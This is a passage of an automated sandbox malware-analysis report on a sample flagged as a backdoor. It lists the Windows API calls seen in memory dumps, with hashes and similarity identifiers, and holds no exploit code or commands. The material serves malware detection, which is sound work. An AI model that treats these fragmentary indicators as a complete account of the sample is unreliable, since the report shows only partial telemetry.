                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
                                                • Instruction ID: a6bba8c6207509d416ae257a12ec8bb3a27c7f2f6e4d8253dea99d4abf8faaad
                                                • Opcode Fuzzy Hash: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
                                                • Instruction Fuzzy Hash: B55140B0A002899EDB20CF31C8856BABBE5EF44310F18846ED2868B353D33D9946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C
                                                  • Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC893
                                                • new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
                                                • Instruction ID: 6f33cdd7b969b0bfb0017989d4411af0190c7222267ad6a689dbbf00d5b4d345
                                                • Opcode Fuzzy Hash: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
                                                • Instruction Fuzzy Hash: 384116B0905B40DED724DF7984899E6FAF5FF18300F504A2ED6EE83282DB366554CB11
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C
                                                  • Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
                                                  • Part of subcall function 007DC827: new.LIBCMT ref: 007DC893
                                                • new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
                                                • Instruction ID: f8d267cd5d77e5b89b9439b92fb6138c1fb5de3267d8e2d05ab07f3f070665dd
                                                • Opcode Fuzzy Hash: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
                                                • Instruction Fuzzy Hash: EF4106B0805B40DEE724DF7984899E7FAE5FF18310F504A2ED2EE83282DB366554CB15
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007F8FA5: GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
                                                  • Part of subcall function 007F8FA5: _free.LIBCMT ref: 007F8FDC
                                                  • Part of subcall function 007F8FA5: SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
                                                  • Part of subcall function 007F8FA5: _abort.LIBCMT ref: 007F9023
                                                  • Part of subcall function 007FB2AE: _abort.LIBCMT ref: 007FB2E0
                                                  • Part of subcall function 007FB2AE: _free.LIBCMT ref: 007FB314
                                                  • Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46
                                                • _free.LIBCMT ref: 007FB200
                                                • _free.LIBCMT ref: 007FB236
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
                                                • Instruction ID: b33b6434c2a7a9b86840055b15e309201e92f561fbc0821c7cba5c323795c14d
                                                • Opcode Fuzzy Hash: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
                                                • Instruction Fuzzy Hash: D631C13190420CEFDB10EFA9C845A7E77E5FF41320F254099EA249B391DB799D41CB41
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007D9EDC,?,?,007D7867), ref: 007D97A6
                                                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007D9EDC,?,?,007D7867), ref: 007D97DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
                                                • Instruction ID: a7be6e160c0a797ba1881c293bdaaf7ad78b2222fe351d72cdc7b07636417dc5
                                                • Opcode Fuzzy Hash: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
                                                • Instruction Fuzzy Hash: 6F21F6B1510749EFD7308F24C885BA7B7F8EB49764F00492EF6E582291C378AC448B61
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007D7547,?,?,?,?), ref: 007D9D7C
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 007D9E2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$BuffersFlushTime
                                                • String ID:
                                                • API String ID: 1392018926-0
                                                • Opcode ID: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
                                                • Instruction ID: e840f13a46dd9446670ee9992a2389912be2122b977507339445bbe795280b21
                                                • Opcode Fuzzy Hash: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
                                                • Instruction Fuzzy Hash: E221F671249286ABC714DE25C851AABBBF5AF55304F04081EB5C083241D32DDA0CCBA1
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007FA4B8
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007FA4C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
                                                • Instruction ID: ea0cd2124e9baba6c5fcda9e919fe1f5e22ad9b8828e52549f8e9eda983a4e04
                                                • Opcode Fuzzy Hash: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
                                                • Instruction Fuzzy Hash: D5113A73601268ABDF25DF2CEC4887B7395BB943207164520FE19AB354EA78DC01C6D2
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,007D9B35,?,?,00000000,?,?,007D8D9C,?), ref: 007D9BC0
                                                • GetLastError.KERNEL32 ref: 007D9BCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
                                                • Instruction ID: dc0bc67f240c72d446fa22e36d5d8843156aba400e8971eb4bffcb594e4046a5
                                                • Opcode Fuzzy Hash: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
                                                • Instruction Fuzzy Hash: C60104B13042059B8B08CE65AD8497EB3B9AFC0721B15462FFA1383390CA79D8059B20
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 007D9E76
                                                • GetLastError.KERNEL32 ref: 007D9E82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
                                                • Instruction ID: 75938dffe432844f67b484ad16b223018693ea760d0e47112c66c9efc0085c70
                                                • Opcode Fuzzy Hash: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
                                                • Instruction Fuzzy Hash: F801B5723056006BEB34DF29DD4876BB7EDAB84314F144A3FB246C3780DA79DC488610
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F8627
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00810F50,007DCE57,?,?,?,?,?,?), ref: 007F8663
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Heap$AllocAllocate_free
                                                • String ID:
                                                • API String ID: 2447670028-0
                                                • Opcode ID: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
                                                • Instruction ID: 95b363fd543ce2c126059d45235283deac81dd608c2cfd378de41eff7ff5652f
                                                • Opcode Fuzzy Hash: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
                                                • Instruction Fuzzy Hash: 2AF0C23220511DA6DBE12B21AC09B7F27589FD1BB0F284215FB14DA393DF2CC80095A7
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?), ref: 007E0915
                                                • GetProcessAffinityMask.KERNEL32(00000000), ref: 007E091C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrentMask
                                                • String ID:
                                                • API String ID: 1231390398-0
                                                • Opcode ID: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
                                                • Instruction ID: 1352f4b084a0b935ddc22d547cd580aea36a20040430f29959ccc788bc23813b
                                                • Opcode Fuzzy Hash: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
                                                • Instruction Fuzzy Hash: 16E09B32A12145BBBF05CEA59C044BB739DEB0C2107104179A806D3103F678FD4186E0
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
                                                • Instruction ID: ec23b3f99013ceff26b07e8f0d1722076c11de68727335270a11263c37a729b9
                                                • Opcode Fuzzy Hash: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
                                                • Instruction Fuzzy Hash: 07F0A03124124DBBDF016F60DC05FDA376CBB08381F048056BC8886261DB7ACAA8AA50
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText_swprintf
                                                • String ID:
                                                • API String ID: 3011073432-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA13E
                                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA16C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00801FA1,000000FF), ref: 007EA3D1
                                                • OleUninitialize.OLE32(?,?,?,?,00801FA1,000000FF), ref: 007EA3D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: GdiplusShutdownUninitialize
                                                • String ID:
                                                • API String ID: 3856339756-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1A5
                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystem
                                                • String ID:
                                                • API String ID: 1175261203-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30
                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007E9B37
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: BitmapCreateFromGdipStream
                                                • String ID:
                                                • API String ID: 1918208029-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007F329A: try_get_function.LIBVCRUNTIME ref: 007F32AF
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F217A
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007F2185
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DloadLock.DELAYIMP ref: 007EDC73
                                                • DloadProtectSection.DELAYIMP ref: 007EDC8F
                                                  • Part of subcall function 007EDE67: DloadObtainSection.DELAYIMP ref: 007EDE77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Dload$Section$LockObtainProtect
                                                • String ID:
                                                • API String ID: 731663317-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemShowWindow
                                                • String ID:
                                                • API String ID: 3351165006-0
                                                Uniqueness

